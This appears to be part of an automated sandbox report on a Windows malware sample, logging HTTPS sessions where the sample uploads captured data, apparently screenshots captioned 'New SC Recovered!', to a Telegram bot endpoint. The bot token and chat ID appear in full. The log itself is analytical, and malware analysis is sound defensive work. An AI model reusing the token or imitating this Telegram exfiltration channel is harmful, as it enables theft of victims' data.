                                                2024-05-17 23:39:29 UTC16355OUTData Raw: 72 55 1b b7 4b 7e a7 d0 d4 ce 65 c9 17 4d 2b f5 bf e8 74 cb aa d8 8e b3 ff 00 e3 ad fe 15 93 ac dc c5 75 76 8f 0b 6e 51 18 04 e0 8e 72 7d 6b 3e 8a ee c3 65 b4 b0 d3 f6 90 6e fe 76 ff 00 23 83 13 99 55 c4 c3 d9 cd 2b 79 5f fc c2 8a 28 af 48 f3 42 8a 28 a0 02 ba 4f 05 7f c8 36 eb fe be 9f f9 2d 73 75 36 9f a8 5f e9 6d 20 b3 68 9a 39 1b 79 49 41 20 1f 51 8a f3 f1 f4 e7 35 17 05 7b 1e e6 4f 5a 95 3f 69 0a 92 51 ba 56 be da 33 7f c4 ba 75 c6 a5 7d 65 14 11 21 1e 4c e0 cb 20 38 88 9d 98 60 40 fb dd 71 d3 a1 ac 3b bd 3a ed a0 bf 4b 6b 3b 91 37 99 74 66 93 cb 61 e7 21 27 60 1f df 39 c1 18 cf 4a b5 ff 00 09 36 b3 ff 00 3c ac 7f ef 97 ff 00 1a 3f e1 26 d6 7f e7 95 8f fd f2 ff 00 e3 5e 6f b1 ab fc 8c f6 3d ad 0f f9 fb 1f bc ea 34 cb 4f b1 58 a4 05 20 42 09 24 5b c6
                                                Data Ascii: rUK~eM+tuvnQr}k>env#U+y_(HB(O6-su6_m h9yIA Q5{OZ?iQV3u}e!L 8`@q;:Kk;7tfa!'`9J6<?&^o=4OX B$[
                                                2024-05-17 23:39:29 UTC15447OUTData Raw: 4a 28 ef ef 40 c2 92 8a 28 00 a4 a3 eb 45 03 0a 28 fc 69 28 18 51 45 14 0c 4a 28 c5 14 80 4f ca 8a 5a 4a 00 3f 3a 28 a2 81 85 25 2d 21 a0 0e ae 8a 28 a9 3c 13 5b c3 7f f2 10 93 fe b9 1f e6 2b a0 9c fe e5 bf 0f e7 5c ff 00 87 3f e3 fe 4f fa e4 7f 98 ad fb 83 fb 96 fc 3f 9d 7c ae 6d fc 77 e8 7d 76 51 fe ee bd 59 02 9a af ab 7f c8 2e 6f f8 0f fe 84 2a 64 35 0e aa 09 d3 26 00 67 a7 f3 15 e6 61 3f de 21 ea bf 33 bf 19 fe ef 53 d1 fe 47 33 45 14 57 de 9f 04 14 51 45 00 15 5e ff 00 fe 3c e4 fc 3f 98 ab 15 5f 50 ff 00 8f 29 3f 0f e6 2b 9f 15 fc 09 fa 3f c8 ef ca ff 00 df a8 7f 8e 3f 9a 3d 2a b2 3c 50 76 68 92 cb 95 cc 4c 8e 03 74 6f 98 71 5a 93 4b 1c 10 bc d2 b0 58 d0 16 66 3d 80 ae 5e f6 7b 8f 12 5f 25 85 bc 66 0b 78 08 96 57 90 6e e7 b0 2a 3f 96 7f 2c 57 ce 55
                                                Data Ascii: J(@(E(i(QEJ(OZJ?:(%-!(<[+\?O?|mw}vQY.o*d5&ga?!3SG3EWQE^<?_P)?+??=*<PvhLtoqZKXf=^{_%fxWn*?,WU
                                                2024-05-17 23:39:29 UTC6381OUTData Raw: 82 79 fd 15 e8 1e 44 3f f3 c9 3f ef 91 47 91 0f fc f2 4f fb e4 51 f5 ff 00 ee fe 3f f0 03 fb 23 fb ff 00 87 fc 13 cf e8 af 40 f2 21 ff 00 9e 49 ff 00 7c 8a 3c 88 7f e7 92 7f df 22 8f af ff 00 77 f1 ff 00 80 1f d9 1f df fc 3f e0 9e 7f 45 7a 07 91 0f fc f2 4f fb e4 51 e4 43 ff 00 3c 93 fe f9 14 7d 7f fb bf 8f fc 00 fe c8 fe ff 00 e1 ff 00 04 f3 fa 2b d0 3c 88 7f e7 92 7f df 22 8f 22 1f f9 e4 9f f7 c8 a3 eb ff 00 dd fc 7f e0 07 f6 47 f7 ff 00 0f f8 27 9f d1 5e 81 e4 43 ff 00 3c 93 fe f9 14 79 10 ff 00 cf 24 ff 00 be 45 1f 5f fe ef e3 ff 00 00 3f b2 3f bf f8 7f c1 3c fe 8a f4 0f 22 1f f9 e4 9f f7 c8 a3 c8 87 fe 79 27 fd f2 28 fa ff 00 f7 7f 1f f8 01 fd 93 fd ff 00 c3 fe 09 e7 f4 57 a0 79 10 ff 00 cf 24 ff 00 be 45 1e 44 3f f3 c9 3f ef 91 47 d7 ff 00 bb f8 ff
                                                Data Ascii: yD??GOQ?#@!I|<"w?EzOQC<}+<""G'^C<y$E_??<"y'(Wy$ED??G
                                                2024-05-17 23:39:29 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 32 39 65 33 30 63 31 61 63 32 66 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc29e30c1ac2f--


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.449753149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:39:30 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc6683c0d1efd
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:30 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 36 36 38 33 63 30 64 31 65 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 36 36 38 33 63 30 64 31 65 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 37 2f 32 30 32 34 20 30 37 3a 30 36 3a 35 33 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc6683c0d1efdContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcc6683c0d1efdContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/27/2024 07:06:53User
                                                2024-05-17 23:39:30 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:39:30 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:39:30 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:39:30 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:39:30 UTC1414OUTData Raw: 00 10 f4 a0 0f 9f 68 a2 8a d4 c0 db d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 a3 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b1 29 28 b0 5c 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da
                                                Data Ascii: h<I=.m`rS$?`;ucO)(\(`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;
                                                2024-05-17 23:39:30 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 36 36 38 33 63 30 64 31 65 66 64 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc6683c0d1efd--
                                                2024-05-17 23:39:30 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:39:31 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:31 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.449754149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:39:30 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc834c9eb4802
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:39:30 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 38 33 34 63 39 65 62 34 38 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 38 33 34 63 39 65 62 34 38 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 39 2f 32 30 32 34 20 31 34 3a 30 33 3a 34 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc834c9eb4802Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dcc834c9eb4802Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/29/2024 14:03:42User
                                                2024-05-17 23:39:30 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:39:30 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:39:30 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:39:30 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:39:30 UTC1414OUTData Raw: 00 10 f4 a0 0f 9f 68 a2 8a d4 c0 db d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 a3 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b1 29 28 b0 5c 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da
                                                Data Ascii: h<I=.m`rS$?`;ucO)(\(`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;
                                                2024-05-17 23:39:30 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 38 33 34 63 39 65 62 34 38 30 32 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc834c9eb4802--
                                                2024-05-17 23:39:31 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:39:31 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:31 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.449755149.154.167.2204436768C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:39:41 UTC238OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dccd9f9e07d58a
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                2024-05-17 23:39:41 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 64 39 66 39 65 30 37 64 35 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 64 39 66 39 65 30 37 64 35 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 35 2f 32 30 32 34 20 31 31 3a 33 30 3a 35 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dccd9f9e07d58aContent-Disposition: form-data; name="chat_id"1165128482-----------------------------8dccd9f9e07d58aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/05/2024 11:30:59User
                                                2024-05-17 23:39:41 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
